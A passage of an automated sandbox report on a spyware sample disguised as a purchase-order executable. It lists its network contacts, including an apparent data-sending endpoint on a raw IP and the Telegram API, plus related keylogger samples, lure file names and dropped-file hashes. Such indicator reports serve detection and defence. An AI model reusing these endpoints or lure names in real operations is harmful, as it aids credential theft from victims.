                                                                                                                    high
                                                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedPO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://reallyfreegeoip.org/xml/PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs
                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        132.226.8.169
                                                                                                                        checkip.dyndns.comUnited States
                                                                                                                        16989UTMEMUSfalse
                                                                                                                        149.154.167.220
                                                                                                                        api.telegram.orgUnited Kingdom
                                                                                                                        62041TELEGRAMRUfalse
                                                                                                                        172.67.177.134
                                                                                                                        reallyfreegeoip.orgUnited States
                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                        Analysis ID:1576077
                                                                                                                        Start date and time:2024-12-16 14:13:12 +01:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 9m 17s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                        Number of analysed new started processes analysed:9
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:0
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample name:PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@6/8@4/3
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 100%
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 98%
                                                                                                                        • Number of executed functions: 135
                                                                                                                        • Number of non-executed functions: 14
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                        • Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.218.208.109, 20.109.210.53, 13.107.246.63
                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                        • VT rate limit hit for: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                        TimeTypeDescription
                                                                                                                        08:14:07API Interceptor6148220x Sleep call for process: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe modified
                                                                                                                        08:14:09API Interceptor9x Sleep call for process: powershell.exe modified
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        132.226.8.169CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        QUOTES REQUEST FOR PRICES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        149.154.167.220TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                              SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                                                  RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                                                    3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                          hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            bg.microsoft.map.fastly.netHA9wRLGT9y.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 199.232.214.172
                                                                                                                                            8Bd1K3FM7v.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 199.232.214.172
                                                                                                                                            Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 199.232.214.172
                                                                                                                                            A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                            • 199.232.210.172
                                                                                                                                            jignesh.exeGet hashmaliciousQuasarBrowse
                                                                                                                                            • 199.232.214.172
                                                                                                                                            skibidi.exeGet hashmaliciousQuasarBrowse
                                                                                                                                            • 199.232.214.172
                                                                                                                                            vanilla.exeGet hashmaliciousQuasarBrowse
                                                                                                                                            • 199.232.214.172
                                                                                                                                            ImageMso.Gallery.xllGet hashmaliciousUnknownBrowse
                                                                                                                                            • 199.232.210.172
                                                                                                                                            Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                            • 199.232.214.172
                                                                                                                                            DVW8WyapUR.exeGet hashmaliciousSpyrix KeyloggerBrowse
                                                                                                                                            • 199.232.210.172
                                                                                                                                            api.telegram.orgTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            reallyfreegeoip.orgref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            TELEGRAMRUnB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 149.154.167.99
                                                                                                                                            UTMEMUSCITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 132.226.247.73
                                                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            QUOTES REQUEST FOR PRICES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.8.169
                                                                                                                                            CLOUDFLARENETUSref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 172.64.41.3
                                                                                                                                            54FApnc7eR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.177.250
                                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 104.21.67.152
                                                                                                                                            PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 104.26.13.205
                                                                                                                                            https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                                                                                                            • 104.17.25.14
                                                                                                                                            https://protect.checkpoint.com/v2/r02/___https://url1251.popmenu.com/qxdhqnhp?zus=z556.WRHPCjsgt/tA51B6LI9w4BubTYwM5p/-7KrggkVEpmPU5/oVFKKM8Rk6rAnqtQtILc2Q2H_3u9DiXC41Sfynx8MyN*~*gGwOol/aO3BY*~*pgD37kbc4-7KGmCSO4DHGqcB*~*D2S053knP-7G*~*y37ScDgrX/lhFDF7r7h5Gwz-7GtvZLu*~*h33zX5RXwSF0oDJX34CSZAvVXm4AFQJ-7Gq-7KxI/mcm4qvQmbxushMLQI9uHWfHKaPI5mifSCu5iVBRcvqUxu7JB4CzzH*~*tp7hI*~*P2JxcRqKbjQDa1m4EV2vJju-7KXGYhKkA/NMg4b3nlprWADF7NLfLtJTf5xKVlxz1PBE*~*XIwKJANjSZxzJHsTEzwI07xTpBPmh9cjRp3bNxF-8I___.YzJlOm1zbm90aWZ5OmM6bzphNDQ0NjUwYTgwNjk4YzE1YzQzODY0NjgzZWZkNGFjNzo3Ojk1N2U6NjEyMTFiMTNiOTljZDFhYmUzOWRiNzM5NDE0NGE3NDNhMDJkZjlhMmI1NzgzMzhlZTAwMjhmZTBkODVlNWNmZDpoOlQ6VAGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.17.25.14
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                            • 172.67.220.198
                                                                                                                                            https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                                                                            • 104.16.99.29
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 172.67.177.134
                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eCITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            rQuotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            invoice.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            https://t.co/eSJUUrWOcOGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            No context
                                                                                                                                            Process:C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):71954
                                                                                                                                            Entropy (8bit):7.996617769952133
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                            Process:C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):328
                                                                                                                                            Entropy (8bit):3.2539954282295116
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:kK199UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:tkDImsLNkPlE99SNxAhUe/3
                                                                                                                                            MD5:0757283C51BC21AD0DB5158F8F14B7A0
                                                                                                                                            SHA1:352BF7F8251C7CC091E44B50CE9DD3FE74C5B56B
                                                                                                                                            SHA-256:BCCF0A21B6526808C98C6CC5CD2298474A381B181249AFE3D34D5C317F6C66FE
                                                                                                                                            SHA-512:944608EFFF4CB733C473C50D40F89813147C5A7D0FCB3F93BBA09FD931A1676DD4208E1F3C748BF5668944B064C72360E5040C074CDC29D9CBDE29E84C5CF21A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:p...... ................(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                            Process:C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1216
                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                            Malicious:true
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1172
                                                                                                                                            Entropy (8bit):5.354777075714867
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:3gWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:QWSU4xympjms4RIoU99tK8NDv
                                                                                                                                            MD5:F614CCA1D985910D63FFFF70966F53F5
                                                                                                                                            SHA1:A9BD00A65E13088BD96A2420E289487CD07D9D4C
                                                                                                                                            SHA-256:3714147C391F57DCDB11C8D0E7076367B3BD1D628A5FB73E2BEE67B99F034157
                                                                                                                                            SHA-512:AE362137DA68C2853EB39BC2EC5A6AD2361689225F28337F0738617D6DB986E4BCF985FE12E910405E621CE407B4E6AF3308ADDDE4F9D81E02F2ED8E27831CAE
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
